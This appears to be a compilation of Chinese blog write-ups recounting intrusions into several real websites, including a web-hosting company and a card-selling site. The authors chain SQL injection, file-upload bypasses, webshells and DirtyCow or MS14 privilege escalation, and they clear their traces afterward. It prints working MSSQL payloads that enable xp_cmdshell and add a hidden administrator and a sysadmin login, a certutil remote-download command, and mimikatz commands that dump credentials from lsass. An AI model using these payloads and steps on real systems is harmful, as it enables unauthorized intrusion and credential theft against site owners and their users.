文章首发于T00LS,未经允许禁止转载

前言

记录某建站公司沦陷的过程。内容简单较为简单，欢迎各位表哥交流指导。

getshell

目标是某建站公司，大致看了一下伪静态，没什么直接撸的欲望，一边扫着端口的同时，一边测了几个案例网站。 好在没让我失望，注入一枚

这个时候端口也扫完了，有两个端口引起了我的注意，999和6588。分别是phpmyadmin和护卫神。 尝试了一下弱口令都无果，整理了一下收集到的信息，以及可利用的点。 案例站大部分与建站公司的网站在同一个服务器上，服务器为 iis7.5,windows2008（存在解析漏洞） 此时有几种方式getshell： 1.直接注入into outfile 2.前台随便找一个上传点传一个包含一句话的图片 3.注入案例站读取管理员密码后台上传 4.挖其他漏洞如：远程文件包含等可直接getshell漏洞 第一二条都失败了，案例站的数据库用户没有读写权限，前台无上传点，由于第四条相对于来说需要另外的时间去挖并且远程包含这种基本没戏，所以最终只能后台getshell了。执行命令发现无法执行，应该是权限不够？上传了aspx大马，访问500，心态炸裂。

提权思路： 1.phpmyadmin直接udf提权（无权限读写） 2.登录护卫神，和流光表哥@赢时胜流光同样的方法 3.搞一个可以解析aspx，权限高一点的网站？等 最后利用2，3结合搞定。

登录护卫神后台+提权

护卫神的漏洞利用条件是可以上传可执行脚本，来读取本地登录护卫神的cookie。shell已经拿到了，直接上传脚本读取cookie。f12 document.cookie 刷新:

这个护卫神是3.7版本的，没有找到上传点，但是不慌，有ftp账号密码，并且找到了支持asp,aspx的网站，直接上大马。可以执行命令，补丁打了倒是不少，查了一下可以利用的exp，用论坛里的几个免杀的烂土豆exp都失败了，webshell版的也报错。

最后弹到cs上，随手试了一下cs自带的提权exp ，ms14那个，尼玛成了。

tasklist /svc查看一下远程端口，由于是外网，直接登录。

读了管理员的密码，清理痕迹溜了。（密码是随机的十二位大小写加特殊字符，这谁顶得住啊） 

总结

水文，每次搞完回头再看的时候都觉得没什么技术含量，的确也是没有什么骚操作，总结一下这次渗透，只有这个读取cookie的php脚本，我学到了，嘻嘻嘻，溜溜球~

本文首发于secquan，未经许可禁止转载

百度云盘真的恶心，不开会员10k/s。

前言#

前天找了点域渗透的环境和资料，都是百度云盘存储的，一个镜像十几个g，下不下来，发现网上有卖百度云VIP账号的，都是一些发卡网，刚好自己最近在学代码审计，就想着下载一套源码自己看看能不能审出漏洞。没想到还真看出来了点东西。

开搞#

目标站点xx.com扫出了readme.txt，是企业版PHP自动发卡源码免授权优化版

看到这免授权优化版我就知道有戏，很可能存在后门。网上找了一套

目录结构和目标站点一样，应该就是这套了。

本地搭建，然后源代码扔到seay先跑着，我先大概看下架构

index.php入口

典型的mvc架构

伪静态重写URL

代码审计这方面我是新手，所以我的目标是找找sql注入、未授权访问、上传点以及越权，当然考虑到是免授权优化版，我还可以找找后门：文件遍历或者代码执行

[后门?]文件遍历#

/bom.php的checkdir()函数

递归遍历当前目录下的所有文件。

这个文件应该是去除文件的bom头，不知道算不算后门。

过滤方式#

\includes\libs\Functions.php

全局makeSafe()函数过滤，强转数字，addslashes()和mysql_real_escape_string()转义字符串，strip_tags去除html标签

\includes\libs\Mysql.php

MySQL使用UTF8编码

我发现的SQL语句变量全部使用单引号进行包裹，寄希望于seay，暂放。

[后门]获取管理员账户#

\admin\adminInfo.php没有鉴权

payload：/admin/adminInfo.php?action=get

[后门]无需密码登录后台#

还是\admin\adminInfo.php

payload:先访问/admin/adminInfo.php?action=info&id=1然后访问/admin/

[后门]SQL注入#

还是\admin\adminInfo.php的infomethod()函数

id直接代入数据库查询，可尝试into outfile

payload

后台任意文件上传#

/admin/set.php未对文件后缀校验

漏洞利用#

文件遍历拿到后台=>adminInfo.php拿到管理员账户或直接登陆=>任意文件上传拿shell

实战#

后门进入后台，上传没有写文件权限，sql注入outfile写文件被宝塔拦截，尝试多种方法无果，放弃，毕竟账号已经有了，下东西去。

ps:我没想到一个卖百度云账号的流水一天也能7k

总结#

网站是死的，思路是活的。渗透测试的精髓是指哪打哪，希望我可以做到。另外如果有师傅知道怎么绕过宝塔写shell的请pm我，感激不尽。有在学代码审计的同学也欢迎找我交流哦！

全文纯属虚构，如有雷同，就雷同吧。

目标国外站http://xxx.xx.com/

云悉指纹

ip：175.117.xxx.xxx 无cdn无waf

概览全局

访问直接跳转到http://xxx.xx.com/member/login.php

手动测试万能密码，尝试无果。

查看源代码寻找敏感路径或敏感api

发现敏感路径

访问仍然跳转到登陆界面，放弃。

目录有迹可循，没有加特殊前缀后缀，掏出御剑

http://xxx.com/admin

简陋后台，尝试万能密码，无果。

查看源代码，无果。(有些账号密码会写在源代码中！)

http://xxx.com/member

发现目录遍历，大部分都被重定向到登陆页面。看下御剑扫出的另外几个

xxx.com/temp/

http://xxx.com/html/ 404

http://xxx.com/data/ 看到这个我知道这个站死定了

被扫描器扫描之后创建了很多文件夹，并且时间都是最近的。很有可能后台编辑器不登陆就能用。

三个目录遍历点，我们需要耐心找下可以利用的文件或者目录。注意留意upload字样的文件夹，因为很有可能会有前人的脚印。这里说一点就是如果你找到前人的马但是不知道密码，你可以尝试下载同名的图片用记事本打开。

测试之后总结下可能被利用的点

http://xxx.xxx/data/imagesfile/upload/文件上传的目录

http://xxx.xxx/data/log/error_201511.logMySQL错误日志爆出绝对路径

http://xxx.xxx/member/check_userid.php

http://xxx/member/message.php

唯一没打码的黄字导航存在注入，post搜索框存在注入，无任何过滤

http://xxx/board/?bid=1

到这里我想的是root权限+绝对路径写shell，美滋滋？

然后sqlmap报了这个，非root，非dba，服了

那只能跑后台管理员账号密码了。。然后没找到管理员表。。。国外站就是太卡，让他先跑着，回头继续看目录遍历，我们现在的目的要转向上传点上。

然后我在目录遍历之中没找到上传点。服了。

峰回路转

在之前的注入点之中，

我忽略了一个细节，而这个细节是谷歌翻译帮助我发现的- –

这个注入点是查看帖子，那么与之相对应的右下角既是发布/创建帖子。

上传点

上传点可用

尝试getshell apache+php5.3 图片白名单 上传重命名 尝试解析漏洞和截断，无果。

发现编辑器还有一个上传点

抓包

未重命名！

apache解析漏洞getshell

访问404？？？

发现不存在_thumb这个目录，不知道怎么回事。

借助之前的目录遍历找到shell

蚁剑

权限是apache，

脏牛获取root，懒得截图了。

写在文后

总结：扫描=》发现目录遍历=》发现注入点=》发现编辑器=》解析漏洞=》getshell=》回马枪目录遍历找到shell=》脏牛

这篇文章花了半个小时去复现截图写稿，但是渗透的整个过程花掉了我两天时间，期间拐过各种坑，总而言之就是自己的经验不足，不够细心，谷歌翻译这个我是真的无语。实战是最好的老师。

文笔不好，写的很乱，见谅。

国外站，翻译的我尴尬证都犯了。

习惯性先发文章看看编辑器上传附件什么的。

四处上传，首先尝试编辑器处上传图片，经验告诉我越low的编辑器越好拿shell。

我错了，白名单+上传重命名，smarteditor编辑器，各种截断尝试，突破不了。

这编辑器无敌。随后发现另外三处均是调用此编辑器上传，暂时换思路。

在已经发布的文章中发现绝对路径

测试后发现public_html为根目录，决定挖挖注入，万一是root没降权就舒服了。

经过手动加sqlmap测试，发现后台存在时间盲注，由于国外站点访问不稳定的原因，遂放弃，在后期getshell之后发现用户不是root并且权限死得很，为之庆幸并没有在此处浪费时间。

到此处思路死了。编辑器getshell无解，sql注入getshell卒。还有什么思路呢？

我们之前爆出绝对路径的url访问后发现会自动下载

存在任意文件下载吗？先构造一下尝试

bingo！

存在任意文件下载，我们找下数据库配置文件

index.php一般会引入数据库的config.php

重新构造

数据库配置get！后发现没开3306外链，思路断掉。

在这个时候我重新回头看这个任意文件下载，读一下敏感文件试试？

password被注释掉，无用。

没发现有可用信息。

下载apache配置文件

惊了！html可以被当作php文件！

于是我去编辑器中尝试上传这几种文件，仍以失败告终。

但是附件的我们还没试！

抓包改后缀，返回文章查看路径

拼接

getshell!

后面的就不说了，提权就是脏牛+bypass disablefunc一条龙，没啥亮点。

本章结束，寡人欲休。

500报错，可能跑不出来，于是试试手工，sqlmap被拦了，但是手工很顺利，可能是加了sqlmap的指纹了吧；

https://img.chabug.org/img/20181021194543.png

判断版本’ or @@version>0 —

计算机名 ‘ or @@SERVERNAME>0 —

爆当前数据库名 ‘ or db_name()>0 —

网站没有找见后台，想着跑出来密码也没有登录地方，于是那些查找数据库、表名、字段名就直接略过，跑出来也登不进去。

先看看其他网站，于是先跑一下二级域名以及旁站，bing查询确实很棒，可以查出好多旁站，极力推荐；

发现三处旁站，一个php的、一个oa还有一个致远协同，没有可以利用的地方，还是先看看注入吧；

先看注入, 当前用户  ‘ or user_name()>0 —

判断是否支持多句查询

’;declare @s int;--

查看一下xp_cmdshell是否开启

首先开启一下xp_cmdshell

';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

显示登录成功，则是命令执行成功，成功开启xp_cmdshell，然后可以执行命令了，但是执行命令没有回显，正常现象；

直接添加用户，显示执行成功，但是没有用户添加上，郁闷，之后才发现是火绒的问题。

';exec master..xp_cmdshell 'net user web$ Web123!@# /add';--

';exec master..xp_cmdshell 'net localgroup administrators web$ /add';--

执行cmd回显：

';create table temp(id int identity(1,1),a varchar(8000));--   创建一个表

';insert into temp exec master.dbo.xp_cmdshell 'whoami'; --   执行cmd指令并且插入到表中

' and (select substring((select a from temp for xml auto),1,8000))>0;-- 可以一次得到所有的结果

';drop table temp;--  删除表

目标显示开启了1433,3389,3306端口，于是可以添加sa用户然后远程连接，增加sa用户：

';exec master.dbo.sp_addlogin test,password;--

';exec master.dbo.sp_addsrvrolemember test,sysadmin;--

可以直接连接，方便好多，比刚才执行命令舒服了好多；

完美，可以直接执行命令，美滋滋。CS或者Msf直接撸之，但是没有vps就很心疼啊，只能找个shell远程下载了。

发现旁站php的配置文件，然后还有phpmyadmin，这里有几个思路拿shell:

• 直接远程下载到web路径；
• 旁站phpmyadmin后台拿shell;
• 旁站登录后台拿shell;

第一个：

直接下载，然后，或者直接下载wce或者procdump.exe直接读取管理员密码然后登录，美滋滋。

certutil.exe -urlcache -split -f http://xxx/uploads/conf1g.txt conf1g.php

move conf1g.php  E:\xxxxx\   失败

直接500报错，看来是有waf，难怪slamp一直跑不出来，直接换个过狗的吧

第二个:

phpmyadmin后台登录几种建表方式没有成功，然后日志写shell也没有成功

第三种

php站进入后台拿shell，密码还没有解开，暂时无法登录拿shell

最近发布的冰蝎管理shell，免杀还是不错的，大马带小马，可以简单操作了

抓hash

wce  失败

Procdump导出，使用mimikatz

mimikatz# sekurlsa::minidump lsass.dmp

mimikatz# sekurlsa::logonPasswords full

成功拿到密码登录

原文xz：https://exp10it.cn/index.php/archives/948/ 有删减

下午看见 chabug 群里直播日站 这个站点好像一直没搞下
想着主站应该什么思路都试过了，那我们就看看旁站

搞下后发现并不能跨目录

回到主站

后台

主站注入

有过滤

大小写绕过

sqlmap没 dump 出来

估计很多人到这里就放弃了…

自己写个小脚本跑内容

原理就是手工注入


后台只有 fckeditor 还是 1.0 的 果断放弃

于是扫目录

filepath 截断

访问 404

a.asp; 这样也不行 服务器是 iis7 的

想到旁站里有 php 的站点 试试解析漏洞

或许这就是大佬吧。

大佬召唤，我不得不起床。
进入后台，寻找上传点，卧槽，发现FCK编辑器哎

我们的XZ大佬现在连FCK编辑器都拿不下来了吗？那就到我装逼的时候了！
然后GG，点击上传图片竟然。。

怪不得，大佬可是给我扔了个黑锅啊。不过还好，旁边还有一个小文件上传，是个上传点。

可是看到这个布局我突然有一种不详的预感。管他呢，burp一顿怼之后，草草放弃了。
因为不管怎么改文件名怎么截断都不解析啊。算了，再翻翻其他的。

这个语言包管理直觉是能够利用，不过可能还要百度源代码审计，想想放弃了，毕竟人家还是小白呢。

继续翻，我就不信了，发现又一个上传点！

好熟悉啊，和刚才发布文章的页面一毛一样！竟然在这有上传点。

那就开怼把！点击插入图片之后是这个样子

很草率啊，不知道能不能上传。先上传一张正常的试试

竟然ok？！那就再试试直接传php后缀的

也上传成功了，但是没有返回路径？？？不急，我记得有一个文件管理。

果然ojbk了。

有没有很佩服我优秀的打码呢？
虚拟终端

[*] 基本信息 [     Linux xxx 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64(xxx) ]
[/wwwroot/upfiles/201802/11/]$ whoami
damachuli
[/wwwroot/upfiles/201802/11/]$ uname -a
Linux xxx 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux

竟然是Linux机器，2012年的，我们可以试试脏牛详情看这里

下载
wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c
编译
gcc -pthread dirty.c -o dirty -lcrypt
运行
./dirty 123456

然后尝试链接提示

fuzz@DESKTOP-JJAMRAA:~$ ssh root@114.80.xxx.xxx
ssh: connect to host 114.80.xxx.xxx port 22: Connection refused

netstat -ntpl查看端口

尝试后发现是55022
链接

首先扫目录

有上传页面 白名单 上传失败

wvs 检测到注入点

表没跑出来

首页有 用户注册

个人中心

发布信息 那里上传调用的也是 /inc/upload.asp

没啥思路 于是就检测旁站 扫到 shell

不灭之魂 右键源代码 font 后面就是密码

?profile=a 爆密码

freehost 星外虚拟主机

提权渣…

Media Index 目录可以执行文件

上传 cmd.exe

不过1秒后就被杀软干掉了

因为是星外的主机 支持 php 尝试写一个死循环不断写入二进制文件

文件生成成功 但拒绝访问

百度发现星外主机还有一个跨目录漏洞

星外虚拟主机跨目录技巧

目标站是 q 开头的 找到这些可疑路径

打包源码 下载 查看数据库

md5 无法解密

仔细看 xinyu 用户

旁站找到一个网站

建站公司 竟然改成房产了…

想了想 可能是后门账户

于是下载它的源码

翻了一会 发现网站配置文件

邮件服务器的账号密码

目标站

建站公司

JJJdhy217315

somd5

和之前解不出来的 md5 一样

直接拿密码登录后台

有数据库备份

尼玛没权限

本地继续翻源码 看看有没有其他上传点

翻到 house 目录 发现 dhb1.asp

dhb 电话簿

后台

和源码里的一样

插入一句话

保存成功

连接